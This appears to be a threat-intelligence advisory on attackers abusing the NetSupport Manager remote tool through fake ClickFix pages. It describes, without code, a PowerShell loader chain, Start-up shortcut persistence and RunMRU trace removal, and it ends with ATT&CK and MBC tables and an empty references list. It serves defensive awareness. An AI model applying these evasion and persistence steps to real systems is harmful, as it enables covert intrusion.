EXECUTIVE SUMMARY:
Researchers have uncovered a surge in malicious activity involving the legitimate remote administration tool NetSupport Manager, repurposed by threat actors to gain unauthorized access and full control of target systems. The attacker workflow begins with a socially engineered lure that directs users to a fake ClickFix-branded page designed to trick victims into executing commands directly via the Windows Run Prompt. Once executed, the adversary initiates a sequence of hidden loader stages that ultimately deploy NetSupport and establish persistent remote control.
The attack chain begins when a victim is redirected to a fraudulent page that instructs them to run a command in the Windows Run dialog. That command typically launches a PowerShell-based loader which decodes embedded Base64 blobs, writes decoded payloads to hidden system folders, and drops a shortcut in the Start-up menu to achieve persistence. The loader validates file integrity, executes the NetSupport client binary, and removes traces such as entries from the RunMRU registry to hinder forensic discovery. Variants use MSI installers executed via msiexec.exe that contain Base64 payloads reconstructed through arithmetic operations on embedded bytes and then executed via Invoke-Expression. Post-deployment activity shows NetSupport clients connecting to remote connectivity servers and using legitimate product components for command-and-control. Operators observed across multiple clusters vary their infrastructure and licensing, often leveraging bulletproof hosting and geographically distributed servers to resist takedown.
This campaign underscores how adversaries are leveraging legitimate remote monitoring and management tools for malicious purposes, coupling them with stealth loaders and layered obfuscation to gain persistent access. It should treat NetSupport deployments with heightened scrutiny, implement controls to restrict non-approved RMM tools, disable or monitor Run prompt usage, and ensure that endpoint detection technologies can detect anomalous loader behaviours and NetSupport clients. Early detection and response will be critical to disrupting these intrusions before lateral movement or further compromise occurs.
THREAT PROFILE:
| Tactic | Technique Id | Technique | Sub-technique |
| Execution | T1204.004 | User Execution | Malicious Copy and Paste |
| T1059.001 | Command and Scripting Interpreter | PowerShell | |
| Persistence | T1547.009 | Boot or Logon Autostart Execution | Shortcut Modification |
| Defense Evasion | T1027.013 | Obfuscated Files or Information | Encrypted/Encoded File |
| T1070.004 | Indicator Removal on Host | File Deletion | |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
| Anti-Behavioral Analysis | B0001 | Debugger Detection |
| Anti-Static Analysis | B0032 | Executable Code Obfuscation |
| Collection | E1113 | Screen Capture |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | F0001 | Software Packing |
| E1055 | Process Injection | |
| Discovery | B0013 | Analysis Tool Discovery |
| Execution | B0011 | Remote Commands |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
REFERENCES:
The following reports contain further technical details: